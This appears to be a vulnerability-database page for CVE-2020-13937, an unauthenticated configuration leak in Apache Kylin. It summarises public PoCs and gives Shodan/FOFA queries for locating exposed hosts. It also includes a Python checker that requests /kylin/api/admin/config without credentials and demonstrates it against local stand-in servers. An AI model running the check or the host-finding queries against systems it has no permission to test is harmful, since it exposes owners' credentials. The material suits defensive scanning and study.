Exploitation Summary
EIP tracks 3 public exploits for CVE-2020-13937. PoCs published by yaunsky, Al1ex, kailing0220. A Nuclei detection template is also available.
AI-analyzed exploit summary
This repository contains a Python script that scans for the Apache Kylin API unauthorized access vulnerability (CVE-2020-13937). It checks if the `/kylin/api/admin/config` endpoint is accessible without authentication.
Description
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0 and 4.0.0-alpha expose one RESTful API that returns Kylin's configuration information without any authentication. This is dangerous because some confidential configuration entries are disclosed to anyone who can reach the endpoint.
Exploits (3)
This repository contains a Python script that scans for the Apache Kylin API unauthorized access vulnerability (CVE-2020-13937). It checks if the `/kylin/api/admin/config` endpoint is accessible without authentication.
This repository describes an information disclosure vulnerability in Apache Kylin where an unauthenticated API endpoint exposes sensitive configuration details. The exploit involves accessing a specific RESTful API endpoint to retrieve confidential information.
This is a functional PoC for CVE-2020-13937, an unauthorized access vulnerability in Apache Kylin. It checks for the exposure of configuration information via an unauthenticated RESTful API endpoint.
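The check the three PoCs perform is the same: an unauthenticated GET to `/kylin/api/admin/config`, with a 200 reply carrying `kylin.*` property names as the proof. The following is an added example written for this page, not code from any of the listed repositories or from Apache Kylin. It assumes the leaky response is a JSON object whose `config` member holds the `kylin.properties` text (the fallback also handles raw key=value text), and it stands up two throwaway local HTTP servers with constructed responses so it runs offline; a 200 that is really a login page, or a 401/403, is deliberately not counted as vulnerable. Property names that look like credentials are reported, but their values are never printed.

```python
"""Offline demonstration of the CVE-2020-13937 check: an unauthenticated
GET to /kylin/api/admin/config, classified by what comes back.
Two tiny in-process HTTP servers stand in for a vulnerable and a patched
Kylin host; their responses are constructed samples, not real Kylin output.
"""
import json
import re
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ENDPOINT = "/kylin/api/admin/config"

# Constructed sample of the kylin.properties text a leaky instance is
# assumed to return inside {"config": "..."} (values are made up).
SAMPLE_CONFIG = (
    "kylin.metadata.url=kylin_metadata@hbase\n"
    "kylin.server.cluster-servers=kylin1:7070,kylin2:7070\n"
    "kylin.security.ldap.connection-password=hunter2\n"
    "kylin.source.hive.beeline-params=-u jdbc:hive2://hive:10000\n"
)

# Property names that usually hold credentials; reported by name only.
SENSITIVE = re.compile(r"password|passwd|secret|token|credential", re.I)


def leaked_keys(body: str):
    """Return the kylin.* property names present in a response body.
    Accepts the assumed JSON wrapper {"config": "..."} or raw key=value
    text, so a differently shaped 200 response is still inspected."""
    try:
        text = json.loads(body).get("config", "")
    except (ValueError, AttributeError):
        text = body
    if not isinstance(text, str):
        text = body
    return re.findall(r"^(kylin\.[\w.\-]+)=", text, re.M)


def classify(status: int, body: str):
    """Vulnerable only if the endpoint answered 200 *and* the body contains
    kylin.* properties; a 401/403, or a 200 login page, is not a finding."""
    if status != 200:
        return {"vulnerable": False, "keys": [], "sensitive": []}
    keys = leaked_keys(body)
    return {
        "vulnerable": bool(keys),
        "keys": keys,
        "sensitive": [k for k in keys if SENSITIVE.search(k)],
    }


def check_host(base_url: str, timeout: float = 5.0):
    """Send the unauthenticated request (no cookie, no Authorization
    header) and classify the reply, including HTTP error replies."""
    req = urllib.request.Request(base_url.rstrip("/") + ENDPOINT,
                                 headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode("utf-8", "replace"))


class LeakyKylin(BaseHTTPRequestHandler):
    """Constructed stand-in for an affected host: 200 plus the config."""
    def do_GET(self):
        payload = json.dumps({"config": SAMPLE_CONFIG}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(payload)

    def log_message(self, *args):
        pass


class PatchedKylin(BaseHTTPRequestHandler):
    """Constructed stand-in for a host that demands authentication."""
    def do_GET(self):
        self.send_response(401)
        self.end_headers()

    def log_message(self, *args):
        pass


def serve(handler_cls):
    """Start a throwaway local server on a random port; return its URL."""
    srv = HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % srv.server_port


def demo():
    """Run the check against both local stand-ins; returns (leaky, patched)."""
    return check_host(serve(LeakyKylin)), check_host(serve(PatchedKylin))


if __name__ == "__main__":
    leaky, patched = demo()
    print("leaky   vulnerable=%s sensitive=%s" % (leaky["vulnerable"], leaky["sensitive"]))
    print("patched vulnerable=%s" % patched["vulnerable"])
```

Against a real target, `check_host("http://kylin.example:7070")` is the only call needed; the classification stays the same. Because the scanner reads only property names, a confirmed hit can be handed to the owning team without the leaked secrets themselves ending up in a ticket or a log.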
Nuclei Templates (1)
Shodan query: http.favicon.hash:-186961397
FOFA query: icon_hash=-186961397
References (1)
Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (base score 5.3, Medium)